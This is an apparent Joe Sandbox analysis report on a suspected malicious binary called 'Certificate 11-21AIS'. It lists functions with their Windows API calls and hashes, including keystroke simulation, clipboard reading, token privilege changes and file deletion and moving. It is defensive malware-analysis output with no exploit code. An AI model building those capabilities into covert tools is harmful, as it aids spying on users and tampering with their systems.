                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2597487223-0
                                                                              • Opcode ID: a30d2521b18807fca78640200d4bba2543636f40a430b7299a49ee0ed8349a08
                                                                              • Instruction ID: d51cb2ce9f02367e5eefdb181089b6ac5cd1fdeb7f7faee59ed6975d7117d196
                                                                              • Opcode Fuzzy Hash: a30d2521b18807fca78640200d4bba2543636f40a430b7299a49ee0ed8349a08
                                                                              • Instruction Fuzzy Hash: CFF0C231900295EADF21AF6E8C0279F3AA9FF42320F148425B414DB191DB788A62DB52
                                                                              Function 008C4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,008C39FE,?,00000001), ref: 008C4286
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: ec8b013898e379444824d6eb8a59ad88f581237ef901557f1edb4e2b123bcab9
                                                                              • Instruction ID: c051c718a5291b5facb6cf79ce839aa95888606e2d23fdf17d3f5d4e259b63fb
                                                                              • Opcode Fuzzy Hash: ec8b013898e379444824d6eb8a59ad88f581237ef901557f1edb4e2b123bcab9
                                                                              • Instruction Fuzzy Hash: B2F0F275509702CFCB349F65D8A6D66BBF5FB0532A3249A2EF19682610C7329980DB50
                                                                              Function 008C40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008C40C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LongNamePath
                                                                              • String ID:
                                                                              • API String ID: 82841172-0
                                                                              • Opcode ID: 2b610d68bc49917f67fde0643e9e5349c451d831a5822dbf8b9e1ce850ff4a1c
                                                                              • Instruction ID: f8a2cbcb32a6a6aab58aacc08bcf92f161f7caf873f4f2337f5a99b03a796e25
                                                                              • Opcode Fuzzy Hash: 2b610d68bc49917f67fde0643e9e5349c451d831a5822dbf8b9e1ce850ff4a1c
                                                                              • Instruction Fuzzy Hash: 4DE0C23A6042345BC711A658CC46FEA77ADEFCD6A0F0900B9FE09E7244EA74E9819691
                                                                              Function 011B4F20 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 011B4F31
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: 7d48a27a596df277905ea595e38c34953401da56b23f83c9d8add926974d9439
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: ABE0BF7494410D9FDB00EFA8D54969E7BB4EF04301F1041A5FD0192281DB3099508A62

                                                                              Non-executed Functions

                                                                              Function 0092F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0092F87D
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0092F8DC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0092F919
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0092F940
                                                                              • SendMessageW.USER32 ref: 0092F966
                                                                              • _wcsncpy.LIBCMT ref: 0092F9D2
                                                                              • GetKeyState.USER32(00000011), ref: 0092F9F3
                                                                              • GetKeyState.USER32(00000009), ref: 0092FA00
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0092FA16
                                                                              • GetKeyState.USER32(00000010), ref: 0092FA20
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0092FA4F
                                                                              • SendMessageW.USER32 ref: 0092FA72
                                                                              • SendMessageW.USER32(?,00001030,?,0092E059), ref: 0092FB6F
                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0092FB85
                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0092FB96
                                                                              • SetCapture.USER32(?), ref: 0092FB9F
                                                                              • ClientToScreen.USER32(?,?), ref: 0092FC03
                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0092FC0F
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0092FC29
                                                                              • ReleaseCapture.USER32 ref: 0092FC34
                                                                              • GetCursorPos.USER32(?), ref: 0092FC69
                                                                              • ScreenToClient.USER32(?,?), ref: 0092FC76
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0092FCD8
                                                                              • SendMessageW.USER32 ref: 0092FD02
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0092FD41
                                                                              • SendMessageW.USER32 ref: 0092FD6C
                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0092FD84
                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0092FD8F
                                                                              • GetCursorPos.USER32(?), ref: 0092FDB0
                                                                              • ScreenToClient.USER32(?,?), ref: 0092FDBD
                                                                              • GetParent.USER32(?), ref: 0092FDD9
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0092FE3F
                                                                              • SendMessageW.USER32 ref: 0092FE6F
                                                                              • ClientToScreen.USER32(?,?), ref: 0092FEC5
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0092FEF1
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0092FF19
                                                                              • SendMessageW.USER32 ref: 0092FF3C
                                                                              • ClientToScreen.USER32(?,?), ref: 0092FF86
                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0092FFB6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0093004B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 2516578528-4164748364
                                                                              • Opcode ID: 2b96545b471d6d37460d5c1f3ce38e8c37abc0a1af00a467444b5c31bf672faa
                                                                              • Instruction ID: 0636c7bddfd67805282c7387de3a841f0c6ac1c8c01e53b15dc5f62be1e1ee9f
                                                                              • Opcode Fuzzy Hash: 2b96545b471d6d37460d5c1f3ce38e8c37abc0a1af00a467444b5c31bf672faa
                                                                              • Instruction Fuzzy Hash: 6232CB78608254AFDB20CF68D894FAABBB8FF49344F040A39F696872A4D731DC01DB51
                                                                              Function 0092AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0092B1CD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: %d/%02d/%02d
                                                                              • API String ID: 3850602802-328681919
                                                                              • Opcode ID: ad4f039e89fad2af5a3cc4cc6afa4d5f0ca75675a7d3c902d2dcd9533d7df5e1
                                                                              • Instruction ID: 7966b393a623b10c301533bf40bc94182560182043452809e4b02ef75d3ebf99
                                                                              • Opcode Fuzzy Hash: ad4f039e89fad2af5a3cc4cc6afa4d5f0ca75675a7d3c902d2dcd9533d7df5e1
                                                                              • Instruction Fuzzy Hash: 19120E72604229ABEB249F68EC49FAE7BF8FF45310F104119F91ADB2D6DB748941CB11
                                                                              Function 008DEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 008DEB4A
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00933AEA
                                                                              • IsIconic.USER32(000000FF), ref: 00933AF3
                                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00933B00
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00933B0A
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00933B20
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00933B27
                                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00933B33
                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00933B44
                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00933B4C
                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00933B54
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00933B57
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00933B6C
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00933B77
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00933B81
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00933B86
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00933B8F
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00933B94
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00933B9E
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00933BA3
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00933BA6
                                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00933BCD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 4125248594-2988720461
                                                                              • Opcode ID: 91dcc6f98a01aa05e49793c8766c84e5a7c468831006a72bcca3ccf82538aa86
                                                                              • Instruction ID: 42dae789794e35c68cdd8203d16ce65589c6d80c4ca80b462fac37fabf9878f0
                                                                              • Opcode Fuzzy Hash: 91dcc6f98a01aa05e49793c8766c84e5a7c468831006a72bcca3ccf82538aa86
                                                                              • Instruction Fuzzy Hash: 6C319479A94218BBEB206B659C49F7F7E7CEB45B50F118015FA05EA1D0DAB05D00AEA0
                                                                              Function 008FACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008FB180
                                                                                • Part of subcall function 008FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008FB1AD
                                                                                • Part of subcall function 008FB134: GetLastError.KERNEL32 ref: 008FB1BA
                                                                              • _memset.LIBCMT ref: 008FAD08
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008FAD5A
                                                                              • CloseHandle.KERNEL32(?), ref: 008FAD6B
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008FAD82
                                                                              • GetProcessWindowStation.USER32 ref: 008FAD9B
                                                                              • SetProcessWindowStation.USER32(00000000), ref: 008FADA5
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008FADBF
                                                                                • Part of subcall function 008FAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008FACC0), ref: 008FAB99
                                                                                • Part of subcall function 008FAB84: CloseHandle.KERNEL32(?,?,008FACC0), ref: 008FABAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2063423040-1027155976
                                                                              • Opcode ID: 14d90b36cd0b836e3dd80c38e98431a504c19f7437c6a2fbf22f939714d9e245
                                                                              • Instruction ID: 1ed74c277e47476aefe21935f8fa69460c32e31fabaa7d7d23830a1dbfd6e9be
                                                                              • Opcode Fuzzy Hash: 14d90b36cd0b836e3dd80c38e98431a504c19f7437c6a2fbf22f939714d9e245
                                                                              • Instruction Fuzzy Hash: 438178B590124DAFDF159FA4CC48ABE7BB8FF09328F044119FA18E6161DB318E549B62
                                                                              Function 009060DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00905FA6,?), ref: 00906ED8
                                                                                • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00905FA6,?), ref: 00906EF1
                                                                                • Part of subcall function 0090725E: __wsplitpath.LIBCMT ref: 0090727B
                                                                                • Part of subcall function 0090725E: __wsplitpath.LIBCMT ref: 0090728E
                                                                                • Part of subcall function 009072CB: GetFileAttributesW.KERNEL32(?,00906019), ref: 009072CC
                                                                              • _wcscat.LIBCMT ref: 00906149
                                                                              • _wcscat.LIBCMT ref: 00906167
                                                                              • __wsplitpath.LIBCMT ref: 0090618E
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009061A4
                                                                              • _wcscpy.LIBCMT ref: 00906209
                                                                              • _wcscat.LIBCMT ref: 0090621C
                                                                              • _wcscat.LIBCMT ref: 0090622F
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0090625D
                                                                              • DeleteFileW.KERNEL32(?), ref: 0090626E
                                                                              • MoveFileW.KERNEL32(?,?), ref: 00906289
                                                                              • MoveFileW.KERNEL32(?,?), ref: 00906298
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 009062AD
                                                                              • DeleteFileW.KERNEL32(?), ref: 009062BE
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009062E1
                                                                              • FindClose.KERNEL32(00000000), ref: 009062FD
                                                                              • FindClose.KERNEL32(00000000), ref: 0090630B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 1917200108-1173974218
                                                                              • Opcode ID: 2e9ddf0ab0da4fa2a195dcf7bd17411f60acbfbaaf93765e883d954382b48f75
                                                                              • Instruction ID: 42d056a01f74b427371b484ee00ad21dacb76dd8e424097bcf299def20d0f31b
                                                                              • Opcode Fuzzy Hash: 2e9ddf0ab0da4fa2a195dcf7bd17411f60acbfbaaf93765e883d954382b48f75
                                                                              • Instruction Fuzzy Hash: A6515E7680811CAECB21EB95CC44DEFB7BCAF05300F0504EAE595E2141DB76A7898FA4
                                                                              Function 00916B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenClipboard.USER32(0095DC00), ref: 00916B36
                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00916B44
                                                                              • GetClipboardData.USER32(0000000D), ref: 00916B4C
                                                                              • CloseClipboard.USER32 ref: 00916B58
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00916B74
                                                                              • CloseClipboard.USER32 ref: 00916B7E
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00916B93
                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00916BA0
                                                                              • GetClipboardData.USER32(00000001), ref: 00916BA8
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00916BB5
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00916BE9
                                                                              • CloseClipboard.USER32 ref: 00916CF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                              • String ID:
                                                                              • API String ID: 3222323430-0
                                                                              • Opcode ID: 355ed5c00a7d6b55338ee40e518e4cdadfa27fc71c836dacde113147a317e064
                                                                              • Instruction ID: a5f1e1376fb55073e7b7009f86497b8b82036a29d431b038604c24214120d0e2
                                                                              • Opcode Fuzzy Hash: 355ed5c00a7d6b55338ee40e518e4cdadfa27fc71c836dacde113147a317e064
                                                                              • Instruction Fuzzy Hash: B751AC79349205ABD300AF68DD56FAE77B8EF85B00F01042DF69AD21E1DF70E8459B62
                                                                              Function 0090F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0090F62B
                                                                              • FindClose.KERNEL32(00000000), ref: 0090F67F
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0090F6A4
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0090F6BB
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0090F6E2
                                                                              • __swprintf.LIBCMT ref: 0090F72E
                                                                              • __swprintf.LIBCMT ref: 0090F767
                                                                              • __swprintf.LIBCMT ref: 0090F7BB
                                                                                • Part of subcall function 008E172B: __woutput_l.LIBCMT ref: 008E1784
                                                                              • __swprintf.LIBCMT ref: 0090F809
                                                                              • __swprintf.LIBCMT ref: 0090F858
                                                                              • __swprintf.LIBCMT ref: 0090F8A7
                                                                              • __swprintf.LIBCMT ref: 0090F8F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 835046349-2428617273
                                                                              • Opcode ID: a05fa3db61a4f4db1116b65cdd986a48654f4ae227727e7157a16ad1888d814c
                                                                              • Instruction ID: d606ab6f1576d2f0820e9b6784a97ac9a36fd4413c2f21952700de8bb7cd83f8
                                                                              • Opcode Fuzzy Hash: a05fa3db61a4f4db1116b65cdd986a48654f4ae227727e7157a16ad1888d814c
                                                                              • Instruction Fuzzy Hash: 05A1FDB2408244ABC350EB99C895EAFB7ECFF95704F44092EF595C2192EB34DA49C763
                                                                              Function 00911B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00911B50
                                                                              • _wcscmp.LIBCMT ref: 00911B65
                                                                              • _wcscmp.LIBCMT ref: 00911B7C
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00911B8E
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00911BA8
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00911BC0
                                                                              • FindClose.KERNEL32(00000000), ref: 00911BCB
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00911BE7
                                                                              • _wcscmp.LIBCMT ref: 00911C0E
                                                                              • _wcscmp.LIBCMT ref: 00911C25
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00911C37
                                                                              • SetCurrentDirectoryW.KERNEL32(009739FC), ref: 00911C55
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00911C5F
                                                                              • FindClose.KERNEL32(00000000), ref: 00911C6C
                                                                              • FindClose.KERNEL32(00000000), ref: 00911C7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1803514871-438819550
                                                                              • Opcode ID: eddd04161c160072828b9f0f7e544eee78608fadedebc46ecf284fd7ce52bb34
                                                                              • Instruction ID: 9c06db0d0f2ee6e5fe70955c293e1ac186e980b5f770af936fe66d2ba5d3730a
                                                                              • Opcode Fuzzy Hash: eddd04161c160072828b9f0f7e544eee78608fadedebc46ecf284fd7ce52bb34
                                                                              • Instruction Fuzzy Hash: 0F31F33674561EBBDF14EFA4DC49EDE73ACAF4A324F004155EA15E2090EB70DA848AA4
                                                                              Function 00911C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00911CAB
                                                                              • _wcscmp.LIBCMT ref: 00911CC0
                                                                              • _wcscmp.LIBCMT ref: 00911CD7
                                                                                • Part of subcall function 00906BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00906BEF
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00911D06
                                                                              • FindClose.KERNEL32(00000000), ref: 00911D11
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00911D2D
                                                                              • _wcscmp.LIBCMT ref: 00911D54
